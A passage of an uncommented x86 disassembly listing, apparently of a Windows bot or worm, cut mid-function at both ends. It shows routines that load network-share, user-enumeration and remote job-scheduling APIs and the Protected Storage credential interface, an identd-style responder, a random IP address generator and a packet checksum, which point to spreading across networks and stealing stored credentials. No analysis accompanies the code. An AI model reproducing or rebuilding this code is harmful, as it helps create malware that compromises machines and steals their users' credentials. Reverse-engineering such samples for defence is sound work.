mov [ebp+var_10], 2
cmp [ebp+arg_4], 0
jz short loc_403790
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; htons
mov [ebp+var_E], ax
loc_403790: ; CODE XREF: sub_403588+1F2�j
and [ebp+var_18], 0
jmp short loc_40379D
; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: sub_403588:loc_4038A7�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_40379D: ; CODE XREF: sub_403588+20C�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_20]
jnb loc_4038AC
cmp [ebp+arg_8], 0
jz short loc_4037B9
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_40], eax
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: sub_403588+225�j
mov [ebp+var_40], 4
loc_4037C0: ; CODE XREF: sub_403588+22F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_40]
mov [ecx+eax], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_4037F1
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_44], eax
jmp short loc_4037F8
; ---------------------------------------------------------------------------
loc_4037F1: ; CODE XREF: sub_403588+25C�j
mov [ebp+var_44], 1
loc_4037F8: ; CODE XREF: sub_403588+267�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_44]
mov [ecx+eax+8], edx
cmp [ebp+arg_8], 0
jz short loc_403819
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_48], eax
jmp short loc_403820
; ---------------------------------------------------------------------------
loc_403819: ; CODE XREF: sub_403588+284�j
mov [ebp+var_48], 6
loc_403820: ; CODE XREF: sub_403588+28F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_48]
mov [ecx+eax+0Ch], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+10h], 10h
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
mov ecx, [ebp+var_18]
imul ecx, 30h
mov edx, [ebp+var_1C]
mov [edx+ecx+18h], eax
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_18]
mov eax, [eax+ecx*4]
mov eax, [eax]
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
cmp [ebp+var_18], 0
jz short loc_4038A7
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
add ecx, eax
mov eax, [ebp+var_18]
dec eax
imul eax, 30h
mov edx, [ebp+var_1C]
mov [edx+eax+1Ch], ecx
loc_4038A7: ; CODE XREF: sub_403588+304�j
jmp loc_403796
; ---------------------------------------------------------------------------
loc_4038AC: ; CODE XREF: sub_403588+21B�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_1C]
mov [eax], ecx
xor eax, eax
locret_4038B6: ; CODE XREF: sub_403588+2E�j
; sub_403588+55�j ...
leave
retn 10h
sub_403588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038BA proc near ; DATA XREF: sub_403BD3+1BC�o
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 434h
cmp [ebp+arg_8], 0
jnz short loc_4038CF
cmp [ebp+arg_10], 0
jz short loc_4038D8
loc_4038CF: ; CODE XREF: sub_4038BA+D�j
mov eax, [ebp+arg_18]
and al, 0E0h
test eax, eax
jz short loc_4038ED
loc_4038D8: ; CODE XREF: sub_4038BA+13�j
push 2726h
call dword_417234 ; WSASetLastError
mov eax, 2726h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4038ED: ; CODE XREF: sub_4038BA+1C�j
mov eax, [ebp+arg_0]
mov [ebp+var_40C], eax
mov eax, [ebp+var_40C]
movsx eax, word ptr [eax]
cmp eax, 2
jz short loc_403919
push 273Fh
call dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403919: ; CODE XREF: sub_4038BA+48�j
cmp [ebp+arg_8], 0
jz loc_403ABA
mov eax, [ebp+var_40C]
push dword ptr [eax+4]
call dword_41721C ; inet_ntoa
mov [ebp+var_434], eax
cmp [ebp+var_434], 0
jnz short loc_403949
or eax, 0FFFFFFFFh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403949: ; CODE XREF: sub_4038BA+85�j
push 401h
push [ebp+var_434]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+arg_18]
and eax, 2
test eax, eax
jz short loc_403972
jmp loc_403BB4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_4038BA+B1�j
mov eax, [ebp+arg_18]
and eax, 4
test eax, eax
jz short loc_4039F4
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_4039AA
call dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: sub_4038BA+E3�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_4039D3
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039D3: ; CODE XREF: sub_4038BA+102�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp loc_403ABA
; ---------------------------------------------------------------------------
loc_4039F4: ; CODE XREF: sub_4038BA+C0�j
mov eax, [ebp+arg_18]
and eax, 1
test eax, eax
jz loc_403A92
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 7F000001h
jz short loc_403A1D
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 0
jnz short loc_403A92
loc_403A1D: ; CODE XREF: sub_4038BA+155�j
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_403A4B
call dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A4B: ; CODE XREF: sub_4038BA+184�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403A74
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A74: ; CODE XREF: sub_4038BA+1A3�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_403ABA
; ---------------------------------------------------------------------------
loc_403A92: ; CODE XREF: sub_4038BA+142�j
; sub_4038BA+161�j ...
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403ABA
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403ABA: ; CODE XREF: sub_4038BA+63�j
; sub_4038BA+135�j ...
cmp [ebp+arg_10], 0
jz loc_403B99
push 8
pop eax
test eax, eax
jz short loc_403B2C
push 0Ah
lea eax, [ebp+var_430]
push eax
mov eax, [ebp+var_40C]
mov ax, [eax+2]
push eax
call dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_430]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B19
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403B19: ; CODE XREF: sub_4038BA+248�j
lea eax, [ebp+var_430]
push eax
push [ebp+arg_10]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403B99
; ---------------------------------------------------------------------------
loc_403B2C: ; CODE XREF: sub_4038BA+20F�j
mov eax, [ebp+arg_18]
and eax, 10h
neg eax
sbb eax, eax
and eax, offset aUdp ; "udp"
push eax
mov eax, [ebp+var_40C]
movzx eax, word ptr [eax+2]
push eax
call dword_417228 ; getservbyport
mov [ebp+var_408], eax
cmp [ebp+var_408], 0
jnz short loc_403B61
or eax, 0FFFFFFFFh
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B61: ; CODE XREF: sub_4038BA+2A0�j
mov eax, [ebp+var_408]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B87
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B87: ; CODE XREF: sub_4038BA+2B9�j
mov eax, [ebp+var_408]
push dword ptr [eax]
push [ebp+arg_10]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403B99: ; CODE XREF: sub_4038BA+204�j
; sub_4038BA+270�j
cmp [ebp+arg_8], 0
jz short loc_403BB0
lea eax, [ebp+var_404]
push eax
push [ebp+arg_8]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403BB0: ; CODE XREF: sub_4038BA+2E3�j
xor eax, eax
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403BB4: ; CODE XREF: sub_4038BA+B3�j
jmp loc_403A92
; ---------------------------------------------------------------------------
locret_403BB9: ; CODE XREF: sub_4038BA+2E�j
; sub_4038BA+5A�j ...
leave
retn 1Ch
sub_4038BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBD proc near ; DATA XREF: sub_403BD3+1C6�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_403BCF
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
loc_403BCF: ; CODE XREF: sub_403BBD+7�j
pop ebp
retn 4
sub_403BBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD3 proc near ; CODE XREF: sub_4167F1:loc_4168BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset aKernel32_dll ; "kernel32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403C00
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push [ebp+var_C]
call dword_417058 ; GetProcAddress
mov dword_41DE10, eax
loc_403C00: ; CODE XREF: sub_403BD3+18�j
push offset aNetapi32_dll ; "netapi32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403CC3
push offset aNetusegetinfo ; "NetUseGetInfo"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE18, eax
push offset aNetuseadd ; "NetUseAdd"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE1C, eax
push offset aNetusedel ; "NetUseDel"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE20, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE24, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE28, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE2C, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE30, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE34, eax
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE38, eax
loc_403CC3: ; CODE XREF: sub_403BD3+3F�j
push offset aMpr_dll ; "mpr.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403D23
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE3C, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE40, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE44, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE48, eax
loc_403D23: ; CODE XREF: sub_403BD3+102�j
push offset aWs2_32_dll ; "ws2_32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
push offset aGetaddrinfo ; "getaddrinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DE54, eax
push offset aGetnameinfo ; "getnameinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DE58, eax
push offset aFreeaddrinfo ; "freeaddrinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DE5C, eax
cmp dword_41DE54, 0
jz short loc_403D85
cmp dword_41DE58, 0
jz short loc_403D85
cmp dword_41DE5C, 0
jnz short loc_403DA3
loc_403D85: ; CODE XREF: sub_403BD3+19E�j
; sub_403BD3+1A7�j
mov dword_41DE54, offset sub_403588
mov dword_41DE58, offset sub_4038BA
mov dword_41DE5C, offset sub_403BBD
loc_403DA3: ; CODE XREF: sub_403BD3+1B0�j
push offset aPstorec_dll ; "pstorec.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_403DCA
push offset aPstorecreatein ; "PStoreCreateInstance"
push [ebp+var_10]
call dword_417058 ; GetProcAddress
mov dword_41DE50, eax
loc_403DCA: ; CODE XREF: sub_403BD3+1E2�j
push offset aWininet_dll ; "wininet.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short locret_403DF1
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push [ebp+var_18]
call dword_417058 ; GetProcAddress
mov dword_41DE4C, eax
locret_403DF1: ; CODE XREF: sub_403BD3+209�j
leave
retn
sub_403BD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF3 proc near ; DATA XREF: sub_403FE5+89�o
var_1228 = dword ptr -1228h
var_1224 = byte ptr -1224h
var_1200 = byte ptr -1200h
var_11DC = byte ptr -11DCh
var_11B8 = dword ptr -11B8h
var_11B4 = dword ptr -11B4h
var_11B0 = dword ptr -11B0h
var_11AC = byte ptr -11ACh
var_11A6 = byte ptr -11A6h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1228h
call sub_416BC0
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_11B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_11AC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_11B4], eax
cmp [ebp+var_11B4], 0
jnz short loc_403E52
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_403FE1
; ---------------------------------------------------------------------------
loc_403E52: ; CODE XREF: sub_403DF3+4A�j
lea eax, [ebp+var_11AC]
push eax
mov eax, [ebp+var_11B0]
push dword ptr [eax]
push offset dword_4189C4
lea eax, [ebp+var_11A6]
push eax
call sub_40D53F
add esp, 10h
loc_403E75: ; CODE XREF: sub_403DF3+BD�j
; sub_403DF3+10F�j ...
push 3E8h
push [ebp+var_11B4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_11B8], eax
mov eax, [ebp+var_11B0]
cmp dword ptr [eax+4], 0
jnz short loc_403EA2
cmp [ebp+var_11B8], 0
jnz short loc_403EA7
loc_403EA2: ; CODE XREF: sub_403DF3+A4�j
jmp loc_403FC7
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: sub_403DF3+AD�j
cmp [ebp+var_11B8], 0FFFFFFFFh
jnz short loc_403EB2
jmp short loc_403E75
; ---------------------------------------------------------------------------
loc_403EB2: ; CODE XREF: sub_403DF3+BB�j
push 1000h
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_1228], eax
cmp [ebp+var_1228], 0
jz short loc_403EF6
cmp [ebp+var_1228], 0FFFFFFFFh
jz short loc_403EF6
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 10h
jbe short loc_403F07
loc_403EF6: ; CODE XREF: sub_403DF3+E6�j
; sub_403DF3+EF�j
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403F07: ; CODE XREF: sub_403DF3+101�j
movsx eax, byte_41EE98
test eax, eax
jz short loc_403F27
push offset byte_41EE98
lea eax, [ebp+var_1224]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403F57
; ---------------------------------------------------------------------------
loc_403F27: ; CODE XREF: sub_403DF3+11D�j
lea eax, [ebp+var_1200]
push eax
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_11DC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1224]
push eax
push offset byte_41EE98
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403F57: ; CODE XREF: sub_403DF3+132�j
push offset aUseridUnix ; " : USERID : UNIX : "
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053BF
add esp, 0Ch
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403DF3:loc_403EA2�j
push [ebp+var_11B4]
call sub_404CBB
pop ecx
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
locret_403FE1: ; CODE XREF: sub_403DF3+5A�j
leave
retn 4
sub_403DF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE5 proc near ; CODE XREF: sub_40A9CF+EEC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_403FFD
push [ebp+arg_4]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_404004
loc_403FFD: ; CODE XREF: sub_403FE5+9�j
mov [ebp+arg_4], offset dword_418A18
loc_404004: ; CODE XREF: sub_403FE5+16�j
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40401A
jmp short locret_40407B
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403FE5+31�j
push 6
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
cmp [ebp+arg_0], 0
jz short loc_404059
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
test eax, eax
jz short loc_404059
and [ebp+var_8], 0
jmp short loc_404060
; ---------------------------------------------------------------------------
loc_404059: ; CODE XREF: sub_403FE5+5E�j
; sub_403FE5+6C�j
mov [ebp+var_8], 1
loc_404060: ; CODE XREF: sub_403FE5+72�j
push [ebp+arg_4]
push offset dword_4189F8
push [ebp+var_8]
push [ebp+var_4]
push offset sub_403DF3
call sub_4095A4
add esp, 14h
locret_40407B: ; CODE XREF: sub_403FE5+33�j
leave
retn
sub_403FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40407D proc near ; CODE XREF: sub_4055E5+772�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404085: ; CODE XREF: sub_40407D+2C�j
cmp [ebp+arg_4], 1
jbe short loc_4040AB
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_40407D+C�j
cmp [ebp+arg_4], 0
jz short loc_4040BF
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4040BF: ; CODE XREF: sub_40407D+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40407D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: sub_4055E5+752�p
; sub_40A9CF+1A2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jz short loc_404146
cmp [ebp+var_4], 3
jz short loc_404124
cmp [ebp+var_4], 4
jz short loc_404106
jmp short loc_40416A
; ---------------------------------------------------------------------------
loc_404106: ; CODE XREF: sub_4040E8+1A�j
mov eax, [ebp+arg_0]
and al, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404124: ; CODE XREF: sub_4040E8+14�j
mov eax, [ebp+arg_0]
and ah, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 8
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404146: ; CODE XREF: sub_4040E8+E�j
mov eax, [ebp+arg_0]
and eax, 0FF00FFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 10h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_40416A: ; CODE XREF: sub_4040E8+1C�j
mov eax, [ebp+arg_0]
and eax, 0FFFFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 18h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
mov eax, [ebp+arg_0]
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_404279+A�p
; sub_40435B+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0Ah
push [ebp+arg_0]
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
pop ebp
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B7 proc near ; CODE XREF: sub_40D871+5B3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push offset dword_418A48
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041D5
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4041B7+17�j
push 4
push offset dword_418A40
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041F0
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041F0: ; CODE XREF: sub_4041B7+32�j
push 8
push offset dword_418A34
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40420B
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_4041B7+4D�j
push 3
push offset dword_418A30
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404226
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_4041B7+68�j
xor eax, eax
loc_404228: ; CODE XREF: sub_4041B7+1C�j
; sub_4041B7+37�j ...
pop ebp
retn
sub_4041B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40422A proc near ; CODE XREF: sub_402A32+206�p
; sub_403FE5+E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40423C
; ---------------------------------------------------------------------------
loc_404235: ; CODE XREF: sub_40422A:loc_404273�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40423C: ; CODE XREF: sub_40422A+9�j
cmp [ebp+var_4], 6
jnz short loc_404244
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_40422A+16�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_404273
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40426C
cmp [ebp+var_8], 0FFFFh
jbe short loc_40426E
loc_40426C: ; CODE XREF: sub_40422A+37�j
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_40426E: ; CODE XREF: sub_40422A+40�j
push 1
pop eax
jmp short locret_404277
; ---------------------------------------------------------------------------
loc_404273: ; CODE XREF: sub_40422A+25�j
jmp short loc_404235
; ---------------------------------------------------------------------------
loc_404275: ; CODE XREF: sub_40422A+18�j
; sub_40422A:loc_40426C�j
xor eax, eax
locret_404277: ; CODE XREF: sub_40422A+47�j
leave
retn
sub_40422A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404279 proc near ; CODE XREF: sub_4042FB+C�p
; sub_408B30+197�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_8]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4042A4
push 1
pop eax
jmp short locret_4042F9
; ---------------------------------------------------------------------------
loc_4042A4: ; CODE XREF: sub_404279+24�j
push 0BB8h
push 0
lea eax, [ebp+var_8]
push eax
push offset dword_41EF18
call sub_4050EA
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_10]
call sub_404CBB
pop ecx
cmp [ebp+var_C], 0
jz short loc_4042DA
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_4042DA
and [ebp+var_18], 0
jmp short loc_4042E1
; ---------------------------------------------------------------------------
loc_4042DA: ; CODE XREF: sub_404279+53�j
; sub_404279+59�j
mov [ebp+var_18], 1
loc_4042E1: ; CODE XREF: sub_404279+5F�j
mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4042F6
push [ebp+var_C]
call sub_4053B1
pop ecx
loc_4042F6: ; CODE XREF: sub_404279+72�j
mov eax, [ebp+var_14]
locret_4042F9: ; CODE XREF: sub_404279+29�j
leave
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042FB proc near ; CODE XREF: sub_411D68+4�p
; sub_41349C+1FA�p ...
push ebp
mov ebp, esp
cmp dword_41E264, 0
jnz short loc_404327
call sub_404279
push eax
